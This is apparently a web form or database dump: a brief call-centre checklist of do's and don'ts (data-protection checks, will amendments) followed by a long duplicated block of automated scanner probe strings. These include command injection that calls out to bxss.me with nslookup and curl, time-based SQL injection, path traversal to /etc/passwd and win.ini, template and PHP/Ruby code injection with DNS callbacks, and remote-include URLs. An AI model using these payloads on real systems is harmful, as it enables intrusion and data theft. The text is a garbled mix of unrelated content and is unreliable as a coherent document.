Do's
Don'ts
DPA check with existing customers, DOB, First line of address and Postcode
Work through the customer journey
Listen to the customer
Phonetically check the names on Will amendments
Check for vunerability
Read validation script
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
;(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)|(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)&(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)
add_do.php/.
19914235
bfg1414<s1﹥s2ʺs3ʹhjl1414
bfgx1192z1z2abcxhjl1192
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg9432<s1﹥s2ʺs3ʹhjl9432
bfgx3072z1z2abcxhjl3072
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
1
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+130-130-1=0+0+0+1 --
-1 OR 2+80-80-1=0+0+0+1
-1' OR 2+173-173-1=0+0+0+1 --
-1' OR 2+628-628-1=0+0+0+1 or 'XUYOZOKE'='
-1" OR 2+124-124-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
YZjug0Hm'; waitfor delay '0:0:15' --
-5 OR 861=(SELECT 861 FROM PG_SLEEP(15))--
-5) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
phkAw6wj' OR 18=(SELECT 18 FROM PG_SLEEP(15))--
f16tDgWc') OR 19=(SELECT 19 FROM PG_SLEEP(15))--
7zwSJM7g')) OR 947=(SELECT 947 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'
1'"
1�%2527%2522
@@oRiGb
1
1
1
1
1
1
1
1
1
1
response.write(9872121*9359615)
'+response.write(9872121*9359615)+'
"+response.write(9872121*9359615)+"
echo tvvzhr$()\ usxpau\nz^xyu||a #' &echo tvvzhr$()\ usxpau\nz^xyu||a #|" &echo tvvzhr$()\ usxpau\nz^xyu||a #
&echo rzkikp$()\ yrmqhp\nz^xyu||a #' &echo rzkikp$()\ yrmqhp\nz^xyu||a #|" &echo rzkikp$()\ yrmqhp\nz^xyu||a #
1&echo rdkqtt$()\ idrrus\nz^xyu||a #' &echo rdkqtt$()\ idrrus\nz^xyu||a #|" &echo rdkqtt$()\ idrrus\nz^xyu||a #
|echo bxwemb$()\ daxbmn\nz^xyu||a #' |echo bxwemb$()\ daxbmn\nz^xyu||a #|" |echo bxwemb$()\ daxbmn\nz^xyu||a #
1|echo aqledl$()\ wjfzng\nz^xyu||a #' |echo aqledl$()\ wjfzng\nz^xyu||a #|" |echo aqledl$()\ wjfzng\nz^xyu||a #
expr 9000653776 - 957952
(nslookup -q=cname hitgbmrfnmeqe334a7.bxss.me||curl hitgbmrfnmeqe334a7.bxss.me))
$(nslookup -q=cname hitrtxonhswnfdaa97.bxss.me||curl hitrtxonhswnfdaa97.bxss.me)
&nslookup -q=cname hitoujzqwxjpla3cf8.bxss.me&'\"`0&nslookup -q=cname hitoujzqwxjpla3cf8.bxss.me&`'
&(nslookup -q=cname hitevtyefecihe1722.bxss.me||curl hitevtyefecihe1722.bxss.me)&'\"`0&(nslookup -q=cname hitevtyefecihe1722.bxss.me||curl hitevtyefecihe1722.bxss.me)&`'
|(nslookup -q=cname hitgdkurupshx2e5a1.bxss.me||curl hitgdkurupshx2e5a1.bxss.me)
`(nslookup -q=cname hitawcpmzombl28b2a.bxss.me||curl hitawcpmzombl28b2a.bxss.me)`
;(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)|(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)&(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitjeyegwwawv8719b.bxss.me||curl${IFS}hitjeyegwwawv8719b.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitfaffljzweve76dd.bxss.me||curl${IFS}hitfaffljzweve76dd.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitfaffljzweve76dd.bxss.me||curl${IFS}hitfaffljzweve76dd.bxss.me)&`'
u7bzZaGV
cxprHUJI: kSwppCGq
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
1
../1
12345'"\'\");|]*�{ <�>''💡
1
${9999959+9999672}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
1&n992271=v975978
)
!(()&&!|*|*|
^(#$!@#$)(()))******
1
'"()
1'&&sleep(27*1000)*dntgdj&&'
1"&&sleep(27*1000)*oqhaqe&&"
1'||sleep(27*1000)*hgstlz||'
1"||sleep(27*1000)*mfczao||"
redirtest.acx
'.gethostbyname(lc('hitps'.'izsratoya5751.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(68).chr(103).chr(83).'
".gethostbyname(lc("hitfi"."iespunkcdfcf0.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(69).chr(117).chr(87)."
gethostbyname(lc('hitxo'.'tirewakhf1b8c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(70).chr(97).chr(71)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(108).concat(65).concat(111).concat(80)+(require"socket" Socket.gethostbyname("hitsz"+"ymdejjxgc7788.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(108).concat(81).concat(116).concat(72)+(require'socket' Socket.gethostbyname('hitwt'+'nyyhnrzc0d77e.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(122).concat(78).concat(102).concat(68)+(require'socket' Socket.gethostbyname('hiteu'+'bipvjpzwcca3a.bxss.me.')[3].to_s)
add_do.php
add_do.php
add_do.php/.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
'"
Work through the customer journey
Listen to the customer
Phonetically check the names on Will amendments
Check for vunerability
Read validation script
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
;(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)|(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)&(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)
add_do.php/.
19914235
bfg1414<s1﹥s2ʺs3ʹhjl1414
bfgx1192z1z2abcxhjl1192
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg9432<s1﹥s2ʺs3ʹhjl9432
bfgx3072z1z2abcxhjl3072
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
1
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+130-130-1=0+0+0+1 --
-1 OR 2+80-80-1=0+0+0+1
-1' OR 2+173-173-1=0+0+0+1 --
-1' OR 2+628-628-1=0+0+0+1 or 'XUYOZOKE'='
-1" OR 2+124-124-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
YZjug0Hm'; waitfor delay '0:0:15' --
-5 OR 861=(SELECT 861 FROM PG_SLEEP(15))--
-5) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
phkAw6wj' OR 18=(SELECT 18 FROM PG_SLEEP(15))--
f16tDgWc') OR 19=(SELECT 19 FROM PG_SLEEP(15))--
7zwSJM7g')) OR 947=(SELECT 947 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'
1'"
1�%2527%2522
@@oRiGb
1
1
1
1
1
1
1
1
1
1
response.write(9872121*9359615)
'+response.write(9872121*9359615)+'
"+response.write(9872121*9359615)+"
echo tvvzhr$()\ usxpau\nz^xyu||a #' &echo tvvzhr$()\ usxpau\nz^xyu||a #|" &echo tvvzhr$()\ usxpau\nz^xyu||a #
&echo rzkikp$()\ yrmqhp\nz^xyu||a #' &echo rzkikp$()\ yrmqhp\nz^xyu||a #|" &echo rzkikp$()\ yrmqhp\nz^xyu||a #
1&echo rdkqtt$()\ idrrus\nz^xyu||a #' &echo rdkqtt$()\ idrrus\nz^xyu||a #|" &echo rdkqtt$()\ idrrus\nz^xyu||a #
|echo bxwemb$()\ daxbmn\nz^xyu||a #' |echo bxwemb$()\ daxbmn\nz^xyu||a #|" |echo bxwemb$()\ daxbmn\nz^xyu||a #
1|echo aqledl$()\ wjfzng\nz^xyu||a #' |echo aqledl$()\ wjfzng\nz^xyu||a #|" |echo aqledl$()\ wjfzng\nz^xyu||a #
expr 9000653776 - 957952
(nslookup -q=cname hitgbmrfnmeqe334a7.bxss.me||curl hitgbmrfnmeqe334a7.bxss.me))
$(nslookup -q=cname hitrtxonhswnfdaa97.bxss.me||curl hitrtxonhswnfdaa97.bxss.me)
&nslookup -q=cname hitoujzqwxjpla3cf8.bxss.me&'\"`0&nslookup -q=cname hitoujzqwxjpla3cf8.bxss.me&`'
&(nslookup -q=cname hitevtyefecihe1722.bxss.me||curl hitevtyefecihe1722.bxss.me)&'\"`0&(nslookup -q=cname hitevtyefecihe1722.bxss.me||curl hitevtyefecihe1722.bxss.me)&`'
|(nslookup -q=cname hitgdkurupshx2e5a1.bxss.me||curl hitgdkurupshx2e5a1.bxss.me)
`(nslookup -q=cname hitawcpmzombl28b2a.bxss.me||curl hitawcpmzombl28b2a.bxss.me)`
;(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)|(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)&(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitjeyegwwawv8719b.bxss.me||curl${IFS}hitjeyegwwawv8719b.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitfaffljzweve76dd.bxss.me||curl${IFS}hitfaffljzweve76dd.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitfaffljzweve76dd.bxss.me||curl${IFS}hitfaffljzweve76dd.bxss.me)&`'
u7bzZaGV
cxprHUJI: kSwppCGq
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
1
../1
12345'"\'\");|]*�{ <�>''💡
1
${9999959+9999672}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
1&n992271=v975978
)
!(()&&!|*|*|
^(#$!@#$)(()))******
1
'"()
1'&&sleep(27*1000)*dntgdj&&'
1"&&sleep(27*1000)*oqhaqe&&"
1'||sleep(27*1000)*hgstlz||'
1"||sleep(27*1000)*mfczao||"
redirtest.acx
'.gethostbyname(lc('hitps'.'izsratoya5751.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(68).chr(103).chr(83).'
".gethostbyname(lc("hitfi"."iespunkcdfcf0.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(69).chr(117).chr(87)."
gethostbyname(lc('hitxo'.'tirewakhf1b8c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(70).chr(97).chr(71)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(108).concat(65).concat(111).concat(80)+(require"socket" Socket.gethostbyname("hitsz"+"ymdejjxgc7788.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(108).concat(81).concat(116).concat(72)+(require'socket' Socket.gethostbyname('hitwt'+'nyyhnrzc0d77e.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(122).concat(78).concat(102).concat(68)+(require'socket' Socket.gethostbyname('hiteu'+'bipvjpzwcca3a.bxss.me.')[3].to_s)
add_do.php
add_do.php
add_do.php/.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
'"